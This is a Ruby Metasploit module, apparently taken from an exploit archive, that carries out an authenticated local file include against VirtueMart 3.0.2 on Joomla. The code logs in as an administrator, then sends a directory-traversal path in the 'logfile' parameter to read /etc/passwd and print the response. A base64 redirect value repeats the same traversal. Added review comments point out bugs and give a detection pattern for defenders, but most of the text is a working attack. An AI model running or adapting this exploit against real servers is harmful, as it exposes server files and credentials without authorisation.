
VirtueMart 3.0.2 LFI poc exploit

  1. ##
  2. # This module requires Metasploit: http://metasploit.com/download
  3. # Current source: https://github.com/rapid7/metasploit-framework
  4. ##
  5.  
  6. require 'msf/core'
  7.  
  ##
  # Metasploit module (2015-era API) for the VirtueMart 3.0.2 local file
  # include described in 'Description' below. The request flow, exactly as
  # written in #exploit, is:
  #   1) GET administrator/index.php to collect cookies and a form token,
  #   2) POST credentials to com_login together with that token,
  #   3) GET administrator/index.php with option=com_virtuemart, view=log,
  #      task=edit and a traversal path in `logfile`, printing the body.
  # Detection note for defenders: an administrator login immediately
  # followed by a com_virtuemart log/edit request whose `logfile` value
  # contains `../` sequences is the observable pattern of this module.
  class Metasploit4 < Msf::Exploit::Remote
    Rank = ExcellentRanking

    include Msf::Exploit::Remote::HttpClient

    # Module metadata and user-tunable options.
    #
    # Options registered: TARGETURI (base Joomla path), USERNAME, PASSWORD,
    # READFILE.
    # NOTE(review): READFILE is registered but never referenced in #exploit,
    # which uses the hard-coded `readthis` string instead; it is also typed
    # OptRegexp although its description says it holds a file path.
    # NOTE(review): 'DisclosureDate' carries a leading space and a
    # DD.MM.YYYY layout; confirm this is the format the targeted framework
    # version accepts.
    def initialize(info = {})
      super(update_info(info,
        'Name' => 'VirtueMart 3 - LFI poc for authenticated users',
          'Description' => %q{
                  VirtueMart 3.0.2 is vulnerable to local file include attack.
                  Authenticated user can read local files from the server.

                  More here: https://twitter.com/HauntITBlog
        },
        'Author' =>
          [
            'HauntIT Blog', # Discovery
                                                    # MSF module (based on http://hauntit.blogspot.com/2015/01/en-hikashop-lfi-metasploit-module.html)
            'http://hauntit.blogspot.com'
          ],
        'License' => MSF_LICENSE,
        'Privileged' => false,
        'Platform'   => ['php'],
        'Arch'       => ARCH_PHP,
        'Targets' =>
          [
            [ 'Automatic', { } ],
          ],
        'DefaultTarget'  => 0,
        'DisclosureDate' => ' 23.12.2014'))
        register_options(
        [
          OptString.new('TARGETURI', [ true, "Base Joomla directory path", 'joomla']),
          OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin']),
          OptString.new('PASSWORD', [ false, "Password to authenticate with", 'admin']),
          # Unused by #exploit (see note above).
          OptRegexp.new('READFILE', [ false, 'Full path to file you want to read', '../etc/passwd'] ),
        ], self.class)
      end

    # No vulnerability check is implemented: the body is empty, so this
    # returns nil rather than a Msf::Exploit::CheckCode value.
    def check
    end

    # Returns the first run of exactly 32 hex characters in my_string
    # (captured via $1), or nil when there is none.
    # The pattern has no boundary anchors, so a longer hex run also matches
    # on its first 32 characters. (camelCase name; Ruby convention would
    # be fetch_md5.)
    def fetchMd5(my_string)
      if my_string  =~ /([0-9a-fA-F]{32})/
        return $1
      end
      return nil
    end


    # Runs the three-request flow described on the class comment.
    # Side effects: prints the response codes, the raw Set-Cookie header,
    # the token and the full body of the final response to the console.
    def exploit
      # 1st, we will get cookies and token
      req1 = send_request_cgi({
          'method'        => 'GET',
          'uri'           => normalize_uri(target_uri.path,'administrator','index.php')
      })
      # NOTE(review): req1 is indexed here *before* the nil check below, so a
      # nil response raises NoMethodError on this line and fail_with is never
      # reached in that case.
      cookies = req1['set-cookie']
      if not req1
        fail_with("[-] Failed with 1st request")
      end

      print_status("[+] Good: " + req1.code.to_s)
      # Writes the raw Set-Cookie header (session material) to the log.
      print_good("[+] Got cookie(s): " + cookies)

      # Only tests that a hidden input with value "1" exists in the page.
      # The token itself is then taken by fetchMd5 from the first 32-hex run
      # anywhere in the body, not from this match -- assumes the two
      # coincide (TODO confirm).
      token_pattern = /(<input type=\"hidden\" name=\"[a-zA-Z0-9]*\" value=\"1\")/
     if req1.body =~ token_pattern
       token = fetchMd5(req1.body)
       print_good("[+] Got token: "+ token.to_s)
     else
       # token stays nil on this path (Ruby still defines the local from the
       # assignment above), so the POST below sends the key "" => 1.
       print_status("[-] Token not found")
     end


     # now we need to do auth using that token and cookies
     print_status("[+] Trying to auth...")

     auth = send_request_cgi({
         'method'        => 'POST',
         'uri'           => normalize_uri(target_uri.path,'administrator','index.php'),
         'cookie'        => cookies,
         'vars_post'     => {
                 'username'      => datastore['USERNAME'],
                 'passwd'        => datastore['PASSWORD'],
                 'option'        => 'com_login',
                 'task'          => 'login',
                 # Base64 literal passed through unchanged; appears to be a
                 # post-login redirect target for the login form -- not
                 # decoded or validated here.
                 'return'        => 'aW5kZXgucGhwP29wdGlvbj1jb21fdmlydHVlbWFydCZ2aWV3PWxvZyZ0YXNrPWVkaXQmbG9nZmlsZT0uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFzc3dk',
                 # Token name as the form field, value 1 (see fetchMd5).
                 token.to_s => 1
       }
     })

     # NOTE(review): auth is not nil-checked; only req1 and xpl are guarded.
     print_good("[+] Code after auth: " + auth.code.to_s)


     # 3rd step: get + post params to lfi
     print_good('[+] Exploit...')
     # Hard-coded traversal path; datastore['READFILE'] is not consulted.
     readthis =  "../../../../../../../../../../../../../../../../../../etc/passwd"

     xpl = send_request_cgi({
         'method'        => 'GET',
         'uri'           => normalize_uri(target_uri.path,'administrator','index.php'),
         'vars_get'      => {
                  'option'   => 'com_virtuemart',
                  'view'  => 'log',
                  'task'  => 'edit',
                  'logfile'    => readthis
         },
         'cookie'        => cookies
     })

     if xpl
       print_good("[+] Exploit response code: " + xpl.code.to_s)
       print_good("[+] Response body after attack:")
       # The entire response body is printed as-is, whatever it contains.
       print_status(xpl.body)
     else
       # NOTE(review): fail_with is called with a single string here and
       # above; the framework's signature takes a failure reason plus a
       # message -- confirm this call form is accepted by the framework
       # version this module targets.
       fail_with("[-] Cannot exploit it :C")
     end
   end # exploit

  end